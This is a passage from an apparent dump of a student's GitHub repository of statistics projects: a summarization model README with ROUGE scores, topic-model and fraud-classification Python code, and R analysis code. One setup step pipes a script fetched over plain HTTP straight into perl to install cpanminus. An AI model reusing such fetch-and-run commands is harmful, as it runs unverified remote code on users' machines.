"UTF-8", "text": "\nThis is the code for my STAT 8056 course 
project. The model is built on top of the [Pointer-Generator model](https://arxiv.org/abs/1704.04368) and the implementation for the PGNet model is adapted from the code in [atulkum/pointer_summarizer](https://github.com/atulkum/pointer_summarizer).\n\n- [Experiment Results](#experiment-results)\n - [Train the original pointer-generator model (with coverage loss disabled)](#train-the-original-pointer-generator-model-with-coverage-loss-disabled)\n - [Train the proposed model (PGNet + Text RBM)](#train-the-proposed-model-pgnet--text-rbm)\n- [Environment Configurations](#environment-configurations)\n- [Training Details](#training-details)\n - [Data Loading and Preprocessing](#data-loading-and-preprocessing)\n - [Model Training](#model-training)\n\n\n## Experiment Results\n### Train the original pointer-generator model (with coverage loss disabled)\nAfter training for 100k iterations (batch size 8)\n\n```\nROUGE-1:\nrouge_1_f_score: 0.3698 with confidence interval (0.3674, 0.3721)\nrouge_1_recall: 0.3907 with confidence interval (0.3880, 0.3933)\nrouge_1_precision: 0.3758 with confidence interval (0.3730, 0.3786)\n\nROUGE-2:\nrouge_2_f_score: 0.1593 with confidence interval (0.1572, 0.1615)\nrouge_2_recall: 0.1675 with confidence interval (0.1652, 0.1699)\nrouge_2_precision: 0.1631 with confidence interval (0.1607, 0.1655)\n\nROUGE-l:\nrouge_l_f_score: 0.3355 with confidence interval (0.3332, 0.3377)\nrouge_l_recall: 0.3541 with confidence interval (0.3517, 0.3567)\nrouge_l_precision: 0.3412 with confidence interval (0.3386, 0.3439)\n```\n\nAfter training for 500k iterations (batch size 8)\n\n```\nROUGE-1:\nrouge_1_f_score: 0.3592 with confidence interval (0.3570, 0.3616)\nrouge_1_recall: 0.3607 with confidence interval (0.3584, 0.3634)\nrouge_1_precision: 0.3812 with confidence interval (0.3785, 0.3841)\n\nROUGE-2:\nrouge_2_f_score: 0.1551 with confidence interval (0.1531, 0.1573)\nrouge_2_recall: 0.1552 with confidence interval (0.1530, 0.1575)\nrouge_2_precision: 
0.1658 with confidence interval (0.1633, 0.1682)\n\nROUGE-l:\nrouge_l_f_score: 0.3287 with confidence interval (0.3265, 0.3311)\nrouge_l_recall: 0.3299 with confidence interval (0.3276, 0.3325)\nrouge_l_precision: 0.3492 with confidence interval (0.3465, 0.3519)\n```\n\n![Alt text](learning_curve_pg.png?raw=true \"Learning Curve with original pgnet\")\n\n### Train the proposed model (PGNet + Text RBM)\nAfter training for 100k iterations (batch size 8)\n\n```\nROUGE-1:\nrouge_1_f_score: 0.3633 with confidence interval (0.3610, 0.3656)\nrouge_1_recall: 0.3843 with confidence interval (0.3818, 0.3869)\nrouge_1_precision: 0.3690 with confidence interval (0.3660, 0.3717)\n\nROUGE-2:\nrouge_2_f_score: 0.1562 with confidence interval (0.1541, 0.1584)\nrouge_2_recall: 0.1648 with confidence interval (0.1625, 0.1671)\nrouge_2_precision: 0.1596 with confidence interval (0.1572, 0.1621)\n\nROUGE-l:\nrouge_l_f_score: 0.3305 with confidence interval (0.3282, 0.3328)\nrouge_l_recall: 0.3494 with confidence interval (0.3469, 0.3519)\nrouge_l_precision: 0.3359 with confidence interval (0.3332, 0.3386)\n```\n\nAfter training for 500k iterations (batch size 8)\n\n```\nROUGE-1:\nrouge_1_f_score: 0.3633 with confidence interval (0.3608, 0.3657)\nrouge_1_recall: 0.3631 with confidence interval (0.3604, 0.3656)\nrouge_1_precision: 0.3880 with confidence interval (0.3851, 0.3909)\n\nROUGE-2:\nrouge_2_f_score: 0.1583 with confidence interval (0.1560, 0.1607)\nrouge_2_recall: 0.1574 with confidence interval (0.1550, 0.1599)\nrouge_2_precision: 0.1705 with confidence interval (0.1679, 0.1733)\n\nROUGE-l:\nrouge_l_f_score: 0.3325 with confidence interval (0.3300, 0.3348)\nrouge_l_recall: 0.3321 with confidence interval (0.3294, 0.3347)\nrouge_l_precision: 0.3554 with confidence interval (0.3525, 0.3582)\n```\n![Alt text](learning_curve_rbmpg.png?raw=true \"Learning Curve with rbmpg\")\n\n\n## Environment Configurations\n1. 
Set up the virtual environment.\n ```bash\n conda env create -f environment.yml\n ```\n1. The implementation in [atulkum/pointer_summarizer](https://github.com/atulkum/pointer_summarizer) uses pytorch 0.4 and python 2.7, for the sake of convenience, we use the same version. Since torch 0.4 is not supported on CUDA 10.0, so we resort to CUDA 9.2. Since Tensorflow-gpu is only compatible with 9, not 9.2, so install tensorflow with cpu only.\n2. Install tensorflow\n\t```bash\n\tpip install --upgrade tensorflow==1.15.0\n\t```\n4. Install pytorch 0.4 to be compatible with the code.\n\t```bash\n\tconda search cudatoolkit\n\tconda search cudnn\n\tconda install cudatoolkit=9.2\n\tconda install cudnn=7.6.0=cuda9.2_0\n\tmodule load cuda/9.2.148\n\tconda install pytorch=0.4.1 cuda92 -c pytorch\n\t```\n4. pip install the **nltk** package.\n\t```bash\n\tpip install nltk==3.4.5\n\t```\n5. Install **pyrouge** and **ROUGE** without root.\n\n\tReference: \n - [stackoverflow: installing pyrouge and ROUGE in ubuntu](https://stackoverflow.com/a/57686103/13448382)\n\t- [stackoverflow: use CPAN as a non-root user](https://stackoverflow.com/questions/2980297/how-can-i-use-cpan-as-a-non-root-user)\n\t- [github issues: install XML::Parser](https://github.com/pltrdy/files2rouge/issues/9#issuecomment-593850124)\n\t```bash\n\t# step 1: install pyrouge from source\n\tgit clone https://github.com/bheinzerling/pyrouge\n\tcd pyrouge\n\tpip install -e .\n\t# step 2: install official ROUGE script\n\tgit clone https://github.com/andersjo/pyrouge.git rouge\n\t# step 3: point pyrouge to official rouge script\n\tpyrouge_set_rouge_path ~/pyrouge/rouge/tools/ROUGE-1.5.5/\n\t# step 4: install xml parser\n\twget -O- http://cpanmin.us | perl - -l ~/perl5 App::cpanminus local::lib\n\teval `perl -I ~/perl5/lib/perl5 -Mlocal::lib`\n\techo 'eval `perl -I ~/perl5/lib/perl5 -Mlocal::lib`' >> ~/.bash_profile\n\techo 'export MANPATH=$HOME/perl5/man:$MANPATH' >> ~/.bash_profile\n\t# step 5: regenerate the Exceptions 
DB\n\tcd rouge/tools/ROUGE-1.5.5/data\n\trm WordNet-2.0.exc.db\n\t./WordNet-2.0-Exceptions/buildExeptionDB.pl ./WordNet-2.0-Exceptions ./smart_common_words.txt ./WordNet-2.0.exc.db\n\t# step 6: run the tests\n\tpython -m pyrouge.test\n\t```\n\t\n\n## Training Details\n\n### Data Loading and Preprocessing\n1. Follow data generation instruction from https://github.com/abisee/cnn-dailymail.\n 1. We need to use [corenlp-3.7.0](https://stanfordnlp.github.io/CoreNLP/history.html) for the script to work.\n 2. We need to load java `module load jdk/9.0.1` in the dags server.\n2. Run `python train_textRBM/get_top15k` to generate a text file containing the 15k most frequent words in the training dataset.\n\n### Model Training\n1. Change the paths and parameters in `data_util/config.py`.\n2. Run `bash start_rbm.sh` to train the Replicated Softmax model.\n3. Run `bash start_train.sh` to train the Pointer-Generator model.\n4. Run `bash start_decode.sh` to decode.\n5. Run `bash start_eval.sh` to evaluate using ROUGE.\n\nNote:\n\n* In decode mode beam search batch should have only one example replicated to batch size\nhttps://github.com/atulkum/pointer_summarizer/blob/master/training_ptr_gen/decode.py#L109\nhttps://github.com/atulkum/pointer_summarizer/blob/master/data_util/batcher.py#L226\n* All the log files have been removed from the repository due to privacy concern.\n\n" }, { "alpha_fraction": 0.7419354915618896, "alphanum_fraction": 0.7419354915618896, "avg_line_length": 30, "blob_id": "d4b8342141e5915272c42f939e1c7608bd9f4c80", "content_id": "d0412ce78f56998cb924d175d3905c80f7a4854b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 31, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/textual_causality/ate/run_ate.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "R CMD BATCH ate.R run_ate.Rout\n" }, { "alpha_fraction": 0.7034700512886047, "alphanum_fraction": 
0.7570977807044983, "avg_line_length": 65.78947448730469, "blob_id": "92451c0a4e4ee41187b3bfc3e5b8ee525d217163", "content_id": "e76348bca4cd35b4c66b885e4b096aef3a0c4fe2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1268, "license_type": "no_license", "max_line_length": 132, "num_lines": 19, "path": "/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# Projects\n\nThis repository contains projects that I have finished so far.\n1. *__Kaggle Travelers__*: 2018 Fall, the final project of STAT 8051.\n - Focuses on classifying insurace fraud.\n2. *__Learning_Rate__*: 2019 Fall, the final project of IE 8521.\n - Focuses on investigating how different learning rate decaying schemes affect the convergence of the algorithm in deep learning.\n3. *__MinneMUDAC__*: 2019 Fall, MinneMUDAC 2019 Student Data Science Challenge.\n - Focuses on prediting soybean price in the commodity market.\n4. *__imbCalib__*: 2020 Spring, the final project of STAT 8054.\n - Focuses on probability calibration under the imbalanced data scenario.\n5. *__wellsfargo__*: 2020 Summer, Wells Fargo Campus Analytics Challenge 2020.\n - Focuses on developing a machine learning model for a binary classification task.\n6. *__lyft__*: 2020 Fall, Kaggle: Lyft Motion Prediction for Autonomous Vehicles\n - Focuses on motion prediction for self-driving vehicles.\n7. *__squad__*: 2020 Fall, the final project of STAT 8931.\n - Focuses on building a model for Machine Reading Comprehension tasks.\n8. *__rbm_summarizer__*: 2021 Spring, the final project of STAT 8056.\n - Focuses on building a summarization model with assistance from topic information." 
}, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.764976978302002, "avg_line_length": 53.25, "blob_id": "d37340e645db5df939462b273aa2679b654366d0", "content_id": "afdcf330fae1ae10b1b974223f2ea57279cb7b9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 434, "license_type": "no_license", "max_line_length": 150, "num_lines": 8, "path": "/movielens/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# MovieLens Recommender System\n\nThis is an applied project that I have done in the course STAT8056.\n\n## Configurations\n1. Use `environment.yml` to create the conda virtual environment: `conda env create -f environment.yml`.\n2. Install PyTorch: `pip install torch==1.7.1+cu101 torchvision==0.8.2+cu101 torchaudio==0.7.2 -f https://download.pytorch.org/whl/torch_stable.html`.\n3. Install TensorFlow: `pip install --upgrade tensorflow`.\n" }, { "alpha_fraction": 0.5404453873634338, "alphanum_fraction": 0.5484392642974854, "avg_line_length": 43.341773986816406, "blob_id": "d84ff72e2cbeba3fcf0a8c27e432eab7f9aaf208", "content_id": "82855ee574845036f658b6e01d364ccdb6ae2b45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10508, "license_type": "no_license", "max_line_length": 114, "num_lines": 237, "path": "/textual_causality/etm-ps/run_etm.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"Train an ETM on CNNDM.\n\"\"\"\n\nimport numpy as np\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as sched\nfrom torch.utils.data import DataLoader\nfrom transformers import RobertaTokenizer, RobertaModel\nfrom collections import OrderedDict\nfrom json import dumps\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\nimport os\nfrom functools import partial\n\nimport util\nfrom args import 
get_train_args\nfrom data_utils import collate_mp, CNNDM\nfrom models import ETM\n\n\ndef main(args):\n # Set up logging and devices\n args.save_dir = util.get_save_dir(args.save_dir, args.name, training=True)\n log = util.get_logger(args.save_dir, args.name)\n tbx = SummaryWriter(args.save_dir)\n device = util.get_devices(args.gpu_ids)\n log.info(f'Args: {dumps(vars(args), indent=4, sort_keys=True)}')\n args.batch_size *= max(1, len(args.gpu_ids))\n\n # Set random seed\n log.info(f'Using random seed {args.seed}...')\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed_all(args.seed)\n\n # Get embeddings\n log.info('Loading embeddings...')\n tokenizer = RobertaTokenizer.from_pretrained(args.model_type, verbose = False)\n encoder = RobertaModel.from_pretrained(args.model_type)\n embeddings = encoder.embeddings.word_embeddings.weight # 50265 x 768\n embed_size = embeddings.size(1)\n vocab_size = tokenizer.vocab_size\n\n # Get model\n log.info('Building model...')\n model = ETM(args.num_topics, vocab_size, embed_size, args.vi_nn_hidden_size,\n args.theta_act, embeddings, args.enc_drop)\n log.info(f\"model: {model}\")\n\n model = nn.DataParallel(model, args.gpu_ids)\n if args.load_path:\n log.info(f'Loading checkpoint from {args.load_path}...')\n model, step = util.load_model(model, args.load_path, args.gpu_ids)\n else:\n step = 0\n model = model.to(device)\n model.train()\n ema = util.EMA(model, args.ema_decay)\n\n # Get saver\n saver = util.CheckpointSaver(args.save_dir,\n max_checkpoints=args.max_checkpoints,\n metric_name=args.metric_name,\n maximize_metric=args.maximize_metric,\n log=log)\n\n # Get optimizer and scheduler\n if args.optimizer == 'adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.l2_wd) # l2 weight decay\n elif args.optimizer == 'adagrad':\n optimizer = optim.Adagrad(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'adadelta':\n 
optimizer = optim.Adadelta(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'rmsprop':\n optimizer = optim.RMSprop(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'asgd':\n optimizer = optim.ASGD(model.parameters(), lr=args.lr, t0=0, lambd=0., weight_decay=args.l2_wd)\n else:\n print('Defaulting to vanilla SGD')\n optimizer = optim.SGD(model.parameters(), lr=args.lr)\n\n scheduler = sched.LambdaLR(optimizer, lambda s: 0.999 ** s) # Constant LR\n\n # Get data loader\n log.info('Building dataset...')\n train_dataset = CNNDM(os.path.join(args.data_dir, \"train\"), args.model_type, is_test = False)\n train_collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n train_loader = DataLoader(train_dataset, \n batch_size=args.batch_size, \n shuffle=True, \n num_workers=args.num_workers, \n collate_fn=train_collate_fn)\n val_dataset = CNNDM(os.path.join(args.data_dir, \"val\"), args.model_type, is_test = True)\n val_collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n val_loader = DataLoader(val_dataset, \n batch_size=args.batch_size, \n shuffle=False, \n num_workers=args.num_workers, \n collate_fn=val_collate_fn)\n\n # Train\n log.info('Training...')\n steps_till_eval = args.eval_steps\n epoch = step // len(train_dataset)\n while epoch != args.num_epochs:\n epoch += 1\n log.info(f'Starting epoch {epoch}...')\n with torch.enable_grad(), \\\n tqdm(total=len(train_loader.dataset)) as progress_bar:\n for (i, batch) in enumerate(train_loader):\n # Setup for forward\n optimizer.zero_grad()\n model.zero_grad() # added for performance consideration\n \n bows = batch[\"src_bows\"].to(device) # (batch_size x vocab_size)\n batch_size = bows.size(0)\n sums = bows.sum(1).unsqueeze(1) # (batch_size x 1)\n if args.bow_norm:\n normalized_bows = bows / sums # (batch_size x vocab_size)\n else:\n 
normalized_bows = bows\n\n if torch.isnan(normalized_bows).any():\n log.info(f\"There are NaNs in bows at batch {i}\")\n\n # Forward\n _, _, kl_divergence, preds = model(normalized_bows=normalized_bows)\n recon_loss = -(preds * bows).sum(1).mean()\n kl_divergence = kl_divergence.mean()\n loss = recon_loss + kl_divergence\n loss_val = loss.item()\n \n # Backward\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n optimizer.step()\n scheduler.step()\n ema(model, step // batch_size)\n\n # Log info\n step += batch_size\n progress_bar.update(batch_size)\n progress_bar.set_postfix(epoch=epoch, \n recon_loss=recon_loss.item(), \n kl_div=kl_divergence.item(), \n NELBO=loss_val)\n tbx.add_scalar('train/recon_loss', recon_loss.item(), step)\n tbx.add_scalar('train/kl_div', kl_divergence.item(), step)\n tbx.add_scalar('train/NELBO', loss_val, step)\n tbx.add_scalar('train/LR', optimizer.param_groups[0]['lr'], step)\n\n steps_till_eval -= batch_size\n if steps_till_eval <= 0:\n steps_till_eval = args.eval_steps\n\n # Evaluate and save checkpoint\n log.info(f'Evaluating at step {step}...')\n ema.assign(model)\n results, pred_topics = evaluate(args, model, val_loader, tokenizer, device)\n saver.save(step, model, results[args.metric_name], device)\n ema.resume(model)\n\n # Log to console\n results_str = ', '.join(f'{k}: {v:05.2f}' for k, v in results.items())\n log.info(f'Val {results_str}')\n for k, topic_words in pred_topics.items():\n if k < 50:\n log.info(f\"Topic {k}: {topic_words}\")\n \n # Log to TensorBoard\n log.info('Visualizing in TensorBoard...')\n for k, v in results.items():\n tbx.add_scalar(f'val/{k}', v, step)\n util.visualize(tbx,\n pred_topics=pred_topics,\n step=step,\n split='val',\n vis_num_topics=args.vis_num_topics)\n\n\ndef evaluate(args, model, data_loader, tokenizer, device):\n ppl_meter = util.AverageMeter()\n model.eval()\n with torch.no_grad(), tqdm(total=len(data_loader.dataset)) as progress_bar:\n beta = 
model(beta_only=True)[:args.num_topics, :] # (K x vocab_size)\n top_10_indices = beta.argsort(dim = -1, descending=True)[:, :10] # (K x 10)\n frequency = torch.zeros(beta.size(0), 55).to(device) # (K x 55), occurrence and cooccurrence\n\n for batch in data_loader:\n bows = batch['src_bows'].to(device)\n batch_size = bows.size(0)\n half_batch_size = batch_size // 2\n bows_1 = bows[:half_batch_size, :]\n bows_2 = bows[half_batch_size: 2 * half_batch_size, :]\n \n # get theta from the first half of the documents\n sums_1 = bows_1.sum(1).unsqueeze(1)\n if args.bow_norm:\n normalized_bows_1 = bows_1 / sums_1 # (half_batch_size x vocab_size)\n else:\n normalized_bows_1 = bows_1\n _, _, _, preds = model(normalized_bows=normalized_bows_1)\n # get prediction on the second half of the documents\n recon_loss = -(preds * bows_2).sum(1) # (half_batch_size, )\n sums_2 = bows_2.sum(1)\n loss = recon_loss / sums_2 # (half_batch_size, )\n ppl_meter.update(loss.mean().item(), half_batch_size)\n\n # get word-doc occurrence frequency: used for topic coherence calculation\n occurrence = 1 * (torch.stack([bows[i, :][top_10_indices] \\\n for i in range(batch_size)]) != 0) # (batch_size x K x 10)\n cooccurence = torch.stack([torch.stack([util.get_outer_triu_values(occurrence[i, j, :]) \\\n for j in range(occurrence.size(1))]) for i in range(occurrence.size(0))]) # (batch_size x K x 55)\n frequency += cooccurence.sum(0) # (K x 55)\n\n # Log info\n progress_bar.update(batch_size)\n progress_bar.set_postfix(PPL=ppl_meter.avg)\n \n results_list = [('PPL', ppl_meter.avg), \n ('TC', util.get_topic_coherence(frequency.data.cpu().numpy(), \\\n len(data_loader.dataset))), \n ('TD', util.get_topic_diversity(beta, args.td_topnum))]\n results = OrderedDict(results_list)\n pred_topics = util.get_topics(beta, tokenizer, args.vis_num_words)\n model.train()\n return results, pred_topics\n\nif __name__ == '__main__':\n main(get_train_args())" }, { "alpha_fraction": 0.7512953281402588, "alphanum_fraction": 
0.7595854997634888, "avg_line_length": 31.16666603088379, "blob_id": "9c8aa64b1c47adabfb18ed1c01d1c4313db191ab", "content_id": "b2f23345008862171c9a033a4aecb44f7b276e10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 965, "license_type": "no_license", "max_line_length": 92, "num_lines": 30, "path": "/wellsfargo/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# 2020 Wells Fargo Campus Analytics Challenge\n\nTeam Members: Xuesong Hou, Chunlin Li, Yu Yang\n\nChallenge Website: https://www.mindsumo.com/contests/campus-analytics-challenge-2020.\n\nThis repository contains all of the code, data, and images throughout our data anlaysis. \n\n### Data\n- `train.csv`, `test.csv`: converted from the original excel file provided by the challenge.\n- `pred.csv`: predictions given by our model.\n\n### Notebooks\n- `eda.ipynb`: exploratory data analysis.\n- `models.ipynb`: model comparison, encoding scheme investigation.\n- `group.ipynb`: fit sparse grouping pursuit models.\n- `models.py`: functions used in `models.ipynb`.\n- `group.py`: functions used in `group.ipynb`.\n\n## Environment Configuration\nCreate a conda environment using the following command in your shell.\n```bash\nconda env create -f environment.yml\n```\n\nActivate or deactivate the virtual environment using the following commands.\n```bash\nconda activate wellsfargo\nconda deactivate\n```\n" }, { "alpha_fraction": 0.6016896963119507, "alphanum_fraction": 0.6367195844650269, "avg_line_length": 36.921875, "blob_id": "3d43950a29037316e42943b2b8bb708fdb10504c", "content_id": "a9159721b3d25024f5c21cee63bfd4103e34a8e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4853, "license_type": "no_license", "max_line_length": 124, "num_lines": 128, "path": "/Kaggle_Travelers/notebooks/Model_comparison.py", "repo_name": "yuyangstatistics/projects", "src_encoding": 
"UTF-8", "text": "##### Import packages #####\nimport numpy as np\nimport pandas as pd\nfrom xgboost import XGBClassifier\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier, \n GradientBoostingClassifier, VotingClassifier)\nfrom mlxtend.classifier import StackingCVClassifier\nfrom lightgbm import LGBMClassifier\nimport warnings\nwarnings.filterwarnings('ignore')\nfrom sklearn.metrics import roc_auc_score\n\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport matplotlib.axes as ax\n\n\n##### Data Manipulation #####\n# read full training data set\ndf = pd.read_csv('data/train_data_clean_5_grouped.csv')\n\ngender_dummies = pd.get_dummies(df['gender'], \n prefix = 'gender', drop_first = True)\ndf = pd.concat([df, gender_dummies], axis = 1)\ndf.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df['living_status'], \n prefix = 'living_status', drop_first = True)\ndf = pd.concat([df, living_status_dummies], axis = 1)\ndf.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df['state'], \n prefix = 'state', drop_first = True)\ndf = pd.concat([df, state_dummies], axis = 1)\ndf.drop([\"state\"], axis = 1, inplace = True)\n\ndf = df.sample(frac=1, random_state=5)\ndf['new_param'] = df.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n\ndf.drop(['claim_number', 'claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf = df.filter(regex=\"^(?!state_).*$\")\ndf = df.filter(regex=\"^(?!vehicle_color_).*$\")\ndf = 
df.filter(regex=\"^(?!claim_day_).*$\")\ndf = df.filter(regex=\"^(?!claim_month_).*$\")\n\nX = df.drop(['fraud'], axis=1)\ny = df['fraud']\n\n\n##### Compare models #####\n# AdaBoost parameters\nada_params = {\n 'n_estimators': 116,\n 'learning_rate': 0.1554\n}\n\n# Random Forest parameters\nrf_params = {\n 'n_estimators': 235,\n 'max_depth': 84,\n 'min_samples_leaf': 34,\n 'max_features': 'sqrt'\n}\n\n# Logistic Regression parameters\nlr_params = {\n 'penalty': 'l1'\n}\n\n# XGBoost parameters\nxgb_params = {\n \"max_depth\": 3, \"learning_rate\": 0.06, \"n_estimators\": 180, \"silent\": True, \"objective\": 'binary:logistic',\n \"gamma\": 0.35, \"min_child_weight\": 5, \"max_delta_step\": 0, \"subsample\": 0.8, \"colsample_bytree\": 0.785,\n \"colsample_bylevel\": 1, \"reg_alpha\": 0.01, \"reg_lambda\": 1, \"scale_pos_weight\": 1, \"seed\": 1440, \"missing\": None\n}\n\n# LightGBM parameters\nlgmb_params = {\n 'boosting_type':'gbdt', 'objective':'binary', 'num_boost_round':800,\n 'feature_fraction': .321, 'bagging_fraction':0.50, 'min_child_samples':100, \n 'min_child_weigh':35, 'max_depth':3, 'num_leaves':2, 'learing_rate':0.15,\n 'reg_alpha':5, 'reg_lambda': 1.1, 'metric':'auc', 'max_bin': 52,\n 'colsample_bytree': 0.9, 'subsample': 0.8, 'is_unbalance': 'true'\n}\n\nada = AdaBoostClassifier(**ada_params)\nrf = RandomForestClassifier(**rf_params)\nlr = LogisticRegression(**lr_params)\nxgb = XGBClassifier(**xgb_params)\nlgbm = LGBMClassifier(**lgmb_params)\nxgb_lgbm = VotingClassifier(estimators=list(zip(['xgb', 'lgbm'], [xgb, lgbm])), \n voting='soft', weights=[6, 4])\nmodels = [ada, rf, lr, xgb, lgbm, xgb_lgbm]\nlong_labels = ['Adaboost', 'Random Forest', 'Logistic Regression', 'XGBoost', 'LightGBM', 'XGBoost_LightGBM']\nprint('5-fold cross validation:\\n')\nfor clf, label in zip(models, long_labels):\n scores = model_selection.cross_val_score(clf, X.values, y.values, cv = 5, scoring = 'roc_auc')\n print(\"AUC: %0.9f (+/- %0.4f) [%s]\" % (scores.mean(), 
scores.std(), label))\n\n\n##### Performance Visualization #####\nobjects = ('Adaboost', 'Random Forest', 'Logistic Regression',\n 'XGBoost', 'LightGBM', 'XGBoost_LightGBM')\ny_pos = np.arange(len(objects))\nperformance = (0.719963411, 0.711689776, 0.709100835, 0.725387261,\n 0.729196909, 0.730128054)\n\nplt.figure(figsize=(8, 6))\nplt.ylim(0.70, 0.74)\nrects = plt.bar(y_pos, performance, align='center', alpha=0.5)\nplt.xticks(y_pos, objects)\nplt.xticks(rotation=30)\nplt.ylabel('AUC')\nplt.title('Model Performance')\n\n\ndef autolabel(rects):\n for rect, perf in zip(rects, performance):\n height = rect.get_height()\n plt.text(rect.get_x() - rect.get_width()/6, 1.001*perf, '%s' % float(perf))\nautolabel(rects)\n\nplt.show()" }, { "alpha_fraction": 0.7544247508049011, "alphanum_fraction": 0.7765486836433411, "avg_line_length": 49.33333206176758, "blob_id": "f3979fb466d1846af78b3db008b473ee247134a6", "content_id": "742252ae938ea7c0d964f5dece36e27e2a14ee29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 452, "license_type": "no_license", "max_line_length": 247, "num_lines": 9, "path": "/Kaggle_Travelers/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# Kaggle: Travelers Claim Fraud Detection\n\nThis is a in-class project for STAT 8051 (Advanced Regression Techniques I). \n\nThe competition website is https://www.kaggle.com/c/2018-trv-statistical-modeling-competition-umn. The goal of this project is to build a predictive model based on historical claim data and provide explanations for the predicted fraudulent claims.\n\nTeam Members: Somyi Baek, Sam Piehl, King Yiu Suen, Xun Xian, Yu Yang.\n\nWe ranked 2nd out 8 teams." 
}, { "alpha_fraction": 0.544089674949646, "alphanum_fraction": 0.5950518250465393, "avg_line_length": 23.25128173828125, "blob_id": "4a516ab980996b45696657543f25d54e8ab01823", "content_id": "9e5ae34f7402a357d9dfc886854daf5bccfcdf58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 4729, "license_type": "no_license", "max_line_length": 77, "num_lines": 195, "path": "/wellsfargo/Rcode/eda.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "## ======= Update at July 25 ========== Yu ##\n\nsetwd(dirname(rstudioapi::getActiveDocumentContext()$path))\ntrain <- read.csv(\"../data/train.csv\")\ntest <- read.csv(\"../data/test.csv\")\nlibrary(dplyr)\n\n## make naive predictions on the train set\ntrain <- within(train, {\n XC <- as.numeric(XC) - 3\n Xg <- X2 + X3 + X4 + X6 + X7 + X11 + X15 + X17 + X19 + X20 + \n X21 + X22 + X25 + X26 + X27 + XC + 2\n})\n\nplot(y ~ Xg, train)\nabline(v=0)\n\n# check error rate\ntrain.pred <- as.numeric(train$Xg < 0)\n(err.rate <- mean(train.pred != train$y)) \n\n# check 1 vs 0 ratio in train$y\nmean(train$y)\n\n## check the margin of the classifier\n# upper part\n(upper <- train %>% \n filter(Xg > 0) %>% \n select(Xg) %>% \n summarise(upper.margin=min(Xg), upper.count=n()))\n# lower part\n(lower <- train %>% \n filter(Xg < 0) %>% \n select(Xg) %>% \n summarise(lower.margin=max(Xg), lower.count=n()))\n\n# make naive predictions on the test set\ntest <- within(test, {\n XC <- as.numeric(XC) - 3\n Xg <- X2 + X3 + X4 + X6 + X7 + X11 + X15 + X17 + X19 + X20 + \n X21 + X22 + X25 + X26 + X27 + XC + 2\n})\n\ntest.pred <- as.numeric(test$Xg < 0)\n\n# check 1 vs 0 raio in test.pred\nmean(test.pred)\n\n# check how many Xg in test would fall in the margin\ntest %>% \n select(Xg) %>%\n filter(Xg >= lower$lower.margin, Xg <= upper$upper.margin)\n \n\n## ======= Update at July 20 ========== Yu ##\nsetwd(dirname(rstudioapi::getActiveDocumentContext()$path))\ntrain <- 
read.csv(\"../data/train.csv\")\ntest <- read.csv(\"../data/test.csv\")\n\n# compare the density curves between train and test\npar(mfrow = c(2, 3))\nfor (i in 1:30) {\n plot(density(train[, i]), col = 'blue', lwd=2, \n main = paste(\"density curve for \", names(train)[i]))\n lines(density(test[, i]), col = 'red', lwd=2)\n legend(\"topright\", legend = c(\"train\", \"test\"), \n col = c(\"blue\", \"red\"), lwd = c(2, 2), cex=0.7)\n}\npar(mfrow = c(1, 1))\n\n# do Kolmogorov-Smirnov test between train and test\nfor (i in 1:30) {\n result <- ks.test(train[, i], test[, i])\n if (result$p.value < 0.1) {\n print(paste(\"i = \", i, sep = \"\"))\n print(result)\n }\n}\n\n# do Mann-Whitney U test between train and test\nfor (i in 1:30) {\n result <- wilcox.test(train[, i], test[, i])\n if (result$p.value < 0.1) {\n print(paste(\"i = \", i, sep = \"\"))\n print(result)\n }\n}\n\n\n## ============================================= ##\n\ndat <- read.csv(\"../data/train.csv\")\n\n### boxplot x~y\n## some are significant\nfor (i in 1:30) {\n 